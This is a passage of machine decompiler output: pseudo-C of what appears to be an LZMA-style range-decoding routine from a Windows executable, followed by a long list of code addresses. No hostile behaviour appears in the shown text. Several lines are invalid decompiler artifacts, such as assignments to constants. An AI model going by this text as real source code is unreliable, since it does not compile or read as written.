                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												L60:
                                                                                                                                                                            												__eflags = __ebx - 0x100;
                                                                                                                                                                            												if(__ebx >= 0x100) {
                                                                                                                                                                            													L55:
                                                                                                                                                                            													__al =  *(__ebp - 0x44);
                                                                                                                                                                            													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                                            													goto L56;
                                                                                                                                                                            												}
                                                                                                                                                                            												L61:
                                                                                                                                                                            												__eax =  *(__ebp - 0x58);
                                                                                                                                                                            												__edx = __ebx + __ebx;
                                                                                                                                                                            												__ecx =  *(__ebp - 0x10);
                                                                                                                                                                            												__esi = __edx + __eax;
                                                                                                                                                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            												__ax =  *__esi;
                                                                                                                                                                            												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            												__edi = __ax & 0x0000ffff;
                                                                                                                                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            													__cx = __ax;
                                                                                                                                                                            													_t217 = __edx + 1; // 0x1
                                                                                                                                                                            													__ebx = _t217;
                                                                                                                                                                            													__cx = __ax >> 5;
                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                            													 *__esi = __ax;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                            													0x800 = 0x800 - __edi;
                                                                                                                                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                            													__ebx = __ebx + __ebx;
                                                                                                                                                                            													 *__esi = __cx;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            													goto L60;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													goto L58;
                                                                                                                                                                            												}
                                                                                                                                                                            											case 0x10:
                                                                                                                                                                            												L109:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            													 *(__ebp - 0x88) = 0x10;
                                                                                                                                                                            													goto L170;
                                                                                                                                                                            												}
                                                                                                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												_t365 = __ebp - 0x70;
                                                                                                                                                                            												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            												__eflags =  *_t365;
                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												goto L111;
                                                                                                                                                                            											case 0x11:
                                                                                                                                                                            												L68:
                                                                                                                                                                            												_t614 =  *(_t621 - 0x58);
                                                                                                                                                                            												 *(_t621 - 0x84) = 0x12;
                                                                                                                                                                            												while(1) {
                                                                                                                                                                            													L132:
                                                                                                                                                                            													 *(_t621 - 0x54) = _t614;
                                                                                                                                                                            													goto L133;
                                                                                                                                                                            												}
                                                                                                                                                                            											case 0x12:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            													__eax =  *(__ebp - 0x58);
                                                                                                                                                                            													 *(__ebp - 0x84) = 0x13;
                                                                                                                                                                            													__esi =  *(__ebp - 0x58) + 2;
                                                                                                                                                                            													while(1) {
                                                                                                                                                                            														L132:
                                                                                                                                                                            														 *(_t621 - 0x54) = _t614;
                                                                                                                                                                            														goto L133;
                                                                                                                                                                            													}
                                                                                                                                                                            												}
                                                                                                                                                                            												__eax =  *(__ebp - 0x4c);
                                                                                                                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                                            												__ecx =  *(__ebp - 0x58);
                                                                                                                                                                            												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                            												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                                            												goto L130;
                                                                                                                                                                            											case 0x13:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            													_t469 = __ebp - 0x58;
                                                                                                                                                                            													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                                            													__eflags =  *_t469;
                                                                                                                                                                            													 *(__ebp - 0x30) = 0x10;
                                                                                                                                                                            													 *(__ebp - 0x40) = 8;
                                                                                                                                                                            													L144:
                                                                                                                                                                            													 *(__ebp - 0x7c) = 0x14;
                                                                                                                                                                            													goto L145;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eax =  *(__ebp - 0x4c);
                                                                                                                                                                            												__ecx =  *(__ebp - 0x58);
                                                                                                                                                                            												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                            												 *(__ebp - 0x30) = 8;
                                                                                                                                                                            												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                                            												L130:
                                                                                                                                                                            												 *(__ebp - 0x58) = __eax;
                                                                                                                                                                            												 *(__ebp - 0x40) = 3;
                                                                                                                                                                            												goto L144;
                                                                                                                                                                            											case 0x14:
                                                                                                                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                                            												__eax =  *(__ebp - 0x80);
                                                                                                                                                                            												 *(_t621 - 0x88) = _t542;
                                                                                                                                                                            												goto L1;
                                                                                                                                                                            											case 0x15:
                                                                                                                                                                            												__eax = 0;
                                                                                                                                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                            												__al = __al & 0x000000fd;
                                                                                                                                                                            												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                            												goto L120;
                                                                                                                                                                            											case 0x16:
                                                                                                                                                                            												__eax =  *(__ebp - 0x30);
                                                                                                                                                                            												__eflags = __eax - 4;
                                                                                                                                                                            												if(__eax >= 4) {
                                                                                                                                                                            													_push(3);
                                                                                                                                                                            													_pop(__eax);
                                                                                                                                                                            												}
                                                                                                                                                                            												__ecx =  *(__ebp - 4);
                                                                                                                                                                            												 *(__ebp - 0x40) = 6;
                                                                                                                                                                            												__eax = __eax << 7;
                                                                                                                                                                            												 *(__ebp - 0x7c) = 0x19;
                                                                                                                                                                            												 *(__ebp - 0x58) = __eax;
                                                                                                                                                                            												goto L145;
                                                                                                                                                                            											case 0x17:
                                                                                                                                                                            												L145:
                                                                                                                                                                            												__eax =  *(__ebp - 0x40);
                                                                                                                                                                            												 *(__ebp - 0x50) = 1;
                                                                                                                                                                            												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                                                                            												goto L149;
                                                                                                                                                                            											case 0x18:
                                                                                                                                                                            												L146:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            													 *(__ebp - 0x88) = 0x18;
                                                                                                                                                                            													goto L170;
                                                                                                                                                                            												}
                                                                                                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												_t484 = __ebp - 0x70;
                                                                                                                                                                            												 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            												__eflags =  *_t484;
                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												L148:
                                                                                                                                                                            												_t487 = __ebp - 0x48;
                                                                                                                                                                            												 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                            												__eflags =  *_t487;
                                                                                                                                                                            												L149:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x48);
                                                                                                                                                                            												if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                            													__ecx =  *(__ebp - 0x40);
                                                                                                                                                                            													__ebx =  *(__ebp - 0x50);
                                                                                                                                                                            													0 = 1;
                                                                                                                                                                            													__eax = 1 << __cl;
                                                                                                                                                                            													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                                                                            													__eax =  *(__ebp - 0x7c);
                                                                                                                                                                            													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            													while(1) {
                                                                                                                                                                            														 *(_t621 - 0x88) = _t542;
                                                                                                                                                                            														goto L1;
                                                                                                                                                                            													}
                                                                                                                                                                            												}
                                                                                                                                                                            												__eax =  *(__ebp - 0x50);
                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                            												__eax =  *(__ebp - 0x58);
                                                                                                                                                                            												__esi = __edx + __eax;
                                                                                                                                                                            												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            												__ax =  *__esi;
                                                                                                                                                                            												__edi = __ax & 0x0000ffff;
                                                                                                                                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            													__cx = __ax;
                                                                                                                                                                            													__cx = __ax >> 5;
                                                                                                                                                                            													__eax = __eax - __ecx;
                                                                                                                                                                            													__edx = __edx + 1;
                                                                                                                                                                            													__eflags = __edx;
                                                                                                                                                                            													 *__esi = __ax;
                                                                                                                                                                            													 *(__ebp - 0x50) = __edx;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                            													0x800 = 0x800 - __edi;
                                                                                                                                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                            													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                            													 *__esi = __cx;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            													goto L148;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													goto L146;
                                                                                                                                                                            												}
                                                                                                                                                                            											case 0x19:
                                                                                                                                                                            												__eflags = __ebx - 4;
                                                                                                                                                                            												if(__ebx < 4) {
                                                                                                                                                                            													 *(__ebp - 0x2c) = __ebx;
                                                                                                                                                                            													L119:
                                                                                                                                                                            													_t393 = __ebp - 0x2c;
                                                                                                                                                                            													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                                                                            													__eflags =  *_t393;
                                                                                                                                                                            													L120:
                                                                                                                                                                            													__eax =  *(__ebp - 0x2c);
                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                            													if(__eax == 0) {
                                                                                                                                                                            														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                                                                            														goto L170;
                                                                                                                                                                            													}
                                                                                                                                                                            													__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                                                                            													if(__eax >  *(__ebp - 0x60)) {
                                                                                                                                                                            														goto L171;
                                                                                                                                                                            													}
                                                                                                                                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                                                                            													__eax =  *(__ebp - 0x30);
                                                                                                                                                                            													_t400 = __ebp - 0x60;
                                                                                                                                                                            													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                                                                            													__eflags =  *_t400;
                                                                                                                                                                            													goto L123;
                                                                                                                                                                            												}
                                                                                                                                                                            												__ecx = __ebx;
                                                                                                                                                                            												__eax = __ebx;
                                                                                                                                                                            												__ecx = __ebx >> 1;
                                                                                                                                                                            												__eax = __ebx & 0x00000001;
                                                                                                                                                                            												__ecx = (__ebx >> 1) - 1;
                                                                                                                                                                            												__al = __al | 0x00000002;
                                                                                                                                                                            												__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                                            												__eflags = __ebx - 0xe;
                                                                                                                                                                            												 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                            												if(__ebx >= 0xe) {
                                                                                                                                                                            													__ebx = 0;
                                                                                                                                                                            													 *(__ebp - 0x48) = __ecx;
                                                                                                                                                                            													L102:
                                                                                                                                                                            													__eflags =  *(__ebp - 0x48);
                                                                                                                                                                            													if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                            														__eax = __eax + __ebx;
                                                                                                                                                                            														 *(__ebp - 0x40) = 4;
                                                                                                                                                                            														 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                            														__eax =  *(__ebp - 4);
                                                                                                                                                                            														__eax =  *(__ebp - 4) + 0x644;
                                                                                                                                                                            														__eflags = __eax;
                                                                                                                                                                            														L108:
                                                                                                                                                                            														__ebx = 0;
                                                                                                                                                                            														 *(__ebp - 0x58) = __eax;
                                                                                                                                                                            														 *(__ebp - 0x50) = 1;
                                                                                                                                                                            														 *(__ebp - 0x44) = 0;
                                                                                                                                                                            														 *(__ebp - 0x48) = 0;
                                                                                                                                                                            														L112:
                                                                                                                                                                            														__eax =  *(__ebp - 0x40);
                                                                                                                                                                            														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                            														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                                                                            															_t391 = __ebp - 0x2c;
                                                                                                                                                                            															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                                                                            															__eflags =  *_t391;
                                                                                                                                                                            															goto L119;
                                                                                                                                                                            														}
                                                                                                                                                                            														__eax =  *(__ebp - 0x50);
                                                                                                                                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                            														__eax =  *(__ebp - 0x58);
                                                                                                                                                                            														__esi = __edi + __eax;
                                                                                                                                                                            														 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            														__ax =  *__esi;
                                                                                                                                                                            														__ecx = __ax & 0x0000ffff;
                                                                                                                                                                            														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                                                                            														__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                            														if( *(__ebp - 0xc) >= __edx) {
                                                                                                                                                                            															__ecx = 0;
                                                                                                                                                                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                                                                            															__ecx = 1;
                                                                                                                                                                            															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                            															__ebx = 1;
                                                                                                                                                                            															__ecx =  *(__ebp - 0x48);
                                                                                                                                                                            															__ebx = 1 << __cl;
                                                                                                                                                                            															__ecx = 1 << __cl;
                                                                                                                                                                            															__ebx =  *(__ebp - 0x44);
                                                                                                                                                                            															__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                                                                            															__cx = __ax;
                                                                                                                                                                            															__cx = __ax >> 5;
                                                                                                                                                                            															__eax = __eax - __ecx;
                                                                                                                                                                            															__edi = __edi + 1;
                                                                                                                                                                            															__eflags = __edi;
                                                                                                                                                                            															 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            															 *__esi = __ax;
                                                                                                                                                                            															 *(__ebp - 0x50) = __edi;
                                                                                                                                                                            														} else {
                                                                                                                                                                            															 *(__ebp - 0x10) = __edx;
                                                                                                                                                                            															0x800 = 0x800 - __ecx;
                                                                                                                                                                            															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                                            															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                            															 *__esi = __dx;
                                                                                                                                                                            														}
                                                                                                                                                                            														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            														if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            															L111:
                                                                                                                                                                            															_t368 = __ebp - 0x48;
                                                                                                                                                                            															 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                                                                            															__eflags =  *_t368;
                                                                                                                                                                            															goto L112;
                                                                                                                                                                            														} else {
                                                                                                                                                                            															goto L109;
                                                                                                                                                                            														}
                                                                                                                                                                            													}
                                                                                                                                                                            													__ecx =  *(__ebp - 0xc);
                                                                                                                                                                            													__ebx = __ebx + __ebx;
                                                                                                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                                                                            													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                            													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                                                                            														__ecx =  *(__ebp - 0x10);
                                                                                                                                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                            														__ebx = __ebx | 0x00000001;
                                                                                                                                                                            														__eflags = __ebx;
                                                                                                                                                                            														 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            													}
                                                                                                                                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            														L101:
                                                                                                                                                                            														_t338 = __ebp - 0x48;
                                                                                                                                                                            														 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                            														__eflags =  *_t338;
                                                                                                                                                                            														goto L102;
                                                                                                                                                                            													} else {
                                                                                                                                                                            														goto L99;
                                                                                                                                                                            													}
                                                                                                                                                                            												}
                                                                                                                                                                            												__edx =  *(__ebp - 4);
                                                                                                                                                                            												__eax = __eax - __ebx;
                                                                                                                                                                            												 *(__ebp - 0x40) = __ecx;
                                                                                                                                                                            												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                                                                            												goto L108;
                                                                                                                                                                            											case 0x1a:
                                                                                                                                                                            												L56:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x64);
                                                                                                                                                                            												if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                            													 *(__ebp - 0x88) = 0x1a;
                                                                                                                                                                            													goto L170;
                                                                                                                                                                            												}
                                                                                                                                                                            												__ecx =  *(__ebp - 0x68);
                                                                                                                                                                            												__al =  *(__ebp - 0x5c);
                                                                                                                                                                            												__edx =  *(__ebp - 8);
                                                                                                                                                                            												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                            												 *( *(__ebp - 0x68)) = __al;
                                                                                                                                                                            												__ecx =  *(__ebp - 0x14);
                                                                                                                                                                            												 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                                                                            												__eax = __ecx + 1;
                                                                                                                                                                            												__edx = 0;
                                                                                                                                                                            												_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                            												__edx = _t192;
                                                                                                                                                                            												goto L79;
                                                                                                                                                                            											case 0x1b:
                                                                                                                                                                            												L75:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x64);
                                                                                                                                                                            												if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                            													 *(__ebp - 0x88) = 0x1b;
                                                                                                                                                                            													goto L170;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                                                                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                            												}
                                                                                                                                                                            												__edx =  *(__ebp - 8);
                                                                                                                                                                            												__cl =  *(__eax + __edx);
                                                                                                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                                                                                                            												 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                            												 *(__eax + __edx) = __cl;
                                                                                                                                                                            												__eax = __eax + 1;
                                                                                                                                                                            												__edx = 0;
                                                                                                                                                                            												_t274 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                            												__edx = _t274;
                                                                                                                                                                            												__eax =  *(__ebp - 0x68);
                                                                                                                                                                            												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                            												_t283 = __ebp - 0x64;
                                                                                                                                                                            												 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                                                                                                            												__eflags =  *_t283;
                                                                                                                                                                            												 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                            												L79:
                                                                                                                                                                            												 *(__ebp - 0x14) = __edx;
                                                                                                                                                                            												goto L80;
                                                                                                                                                                            											case 0x1c:
                                                                                                                                                                            												while(1) {
                                                                                                                                                                            													L123:
                                                                                                                                                                            													__eflags =  *(__ebp - 0x64);
                                                                                                                                                                            													if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                            														break;
                                                                                                                                                                            													}
                                                                                                                                                                            													__eax =  *(__ebp - 0x14);
                                                                                                                                                                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                            													__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                            													if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                            														__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                            														__eflags = __eax;
                                                                                                                                                                            													}
                                                                                                                                                                            													__edx =  *(__ebp - 8);
                                                                                                                                                                            													__cl =  *(__eax + __edx);
                                                                                                                                                                            													__eax =  *(__ebp - 0x14);
                                                                                                                                                                            													 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                            													 *(__eax + __edx) = __cl;
                                                                                                                                                                            													__eax = __eax + 1;
                                                                                                                                                                            													__edx = 0;
                                                                                                                                                                            													_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                            													__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                            													__edx = _t414;
                                                                                                                                                                            													__eax =  *(__ebp - 0x68);
                                                                                                                                                                            													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                            													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                                                                            													__eflags =  *(__ebp - 0x30);
                                                                                                                                                                            													 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                            													 *(__ebp - 0x14) = _t414;
                                                                                                                                                                            													if( *(__ebp - 0x30) > 0) {
                                                                                                                                                                            														continue;
                                                                                                                                                                            													} else {
                                                                                                                                                                            														L80:
                                                                                                                                                                            														 *(__ebp - 0x88) = 2;
                                                                                                                                                                            														goto L1;
                                                                                                                                                                            													}
                                                                                                                                                                            												}
                                                                                                                                                                            												 *(__ebp - 0x88) = 0x1c;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            									L171:
                                                                                                                                                                            									_t544 = _t543 | 0xffffffff;
                                                                                                                                                                            									goto L172;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L1;
                                                                                                                                                                            				}
                                                                                                                                                                            			}














                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004065e3
                                                                                                                                                                            0x004065e3
                                                                                                                                                                            0x004065e7
                                                                                                                                                                            0x00406608
                                                                                                                                                                            0x0040660f
                                                                                                                                                                            0x00406615
                                                                                                                                                                            0x0040661b
                                                                                                                                                                            0x0040662d
                                                                                                                                                                            0x00406633
                                                                                                                                                                            0x00406638
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004065e9
                                                                                                                                                                            0x004065ef
                                                                                                                                                                            0x004069b0
                                                                                                                                                                            0x004069b0
                                                                                                                                                                            0x004069b0
                                                                                                                                                                            0x004069b3
                                                                                                                                                                            0x004069b3
                                                                                                                                                                            0x004069b3
                                                                                                                                                                            0x004069b9
                                                                                                                                                                            0x004069bf
                                                                                                                                                                            0x004069c5
                                                                                                                                                                            0x004069df
                                                                                                                                                                            0x004069e2
                                                                                                                                                                            0x004069e8
                                                                                                                                                                            0x004069f3
                                                                                                                                                                            0x004069f5
                                                                                                                                                                            0x004069c7
                                                                                                                                                                            0x004069c7
                                                                                                                                                                            0x004069d6
                                                                                                                                                                            0x004069da
                                                                                                                                                                            0x004069da
                                                                                                                                                                            0x004069ff
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406a01
                                                                                                                                                                            0x00406a05
                                                                                                                                                                            0x00406bb4
                                                                                                                                                                            0x00406bca
                                                                                                                                                                            0x00406bd2
                                                                                                                                                                            0x00406bd9
                                                                                                                                                                            0x00406bdb
                                                                                                                                                                            0x00406be2
                                                                                                                                                                            0x00406be6
                                                                                                                                                                            0x00406be6
                                                                                                                                                                            0x00406a11
                                                                                                                                                                            0x00406a18
                                                                                                                                                                            0x00406a20
                                                                                                                                                                            0x00406a23
                                                                                                                                                                            0x00406a26
                                                                                                                                                                            0x00406a26
                                                                                                                                                                            0x00406a2c
                                                                                                                                                                            0x00406a2c
                                                                                                                                                                            0x004061c8
                                                                                                                                                                            0x004061c8
                                                                                                                                                                            0x004061c8
                                                                                                                                                                            0x004061d1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004061d7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004061e2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004061eb
                                                                                                                                                                            0x004061ee
                                                                                                                                                                            0x004061f1
                                                                                                                                                                            0x004061f5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004061fb
                                                                                                                                                                            0x004061fe
                                                                                                                                                                            0x00406200
                                                                                                                                                                            0x00406201
                                                                                                                                                                            0x00406204
                                                                                                                                                                            0x00406206
                                                                                                                                                                            0x00406207
                                                                                                                                                                            0x00406209
                                                                                                                                                                            0x0040620c
                                                                                                                                                                            0x00406211
                                                                                                                                                                            0x00406216
                                                                                                                                                                            0x0040621f
                                                                                                                                                                            0x00406232
                                                                                                                                                                            0x00406235
                                                                                                                                                                            0x00406241
                                                                                                                                                                            0x00406269
                                                                                                                                                                            0x0040626b
                                                                                                                                                                            0x00406279
                                                                                                                                                                            0x00406279
                                                                                                                                                                            0x0040627d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040626d
                                                                                                                                                                            0x0040626d
                                                                                                                                                                            0x00406270
                                                                                                                                                                            0x00406271
                                                                                                                                                                            0x00406271
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040626d
                                                                                                                                                                            0x00406247
                                                                                                                                                                            0x0040624c
                                                                                                                                                                            0x0040624c
                                                                                                                                                                            0x00406255
                                                                                                                                                                            0x0040625d
                                                                                                                                                                            0x00406260
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406266
                                                                                                                                                                            0x00406266
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406266
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406283
                                                                                                                                                                            0x00406283
                                                                                                                                                                            0x00406287
                                                                                                                                                                            0x00406b33
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406b33
                                                                                                                                                                            0x00406290
                                                                                                                                                                            0x004062a0
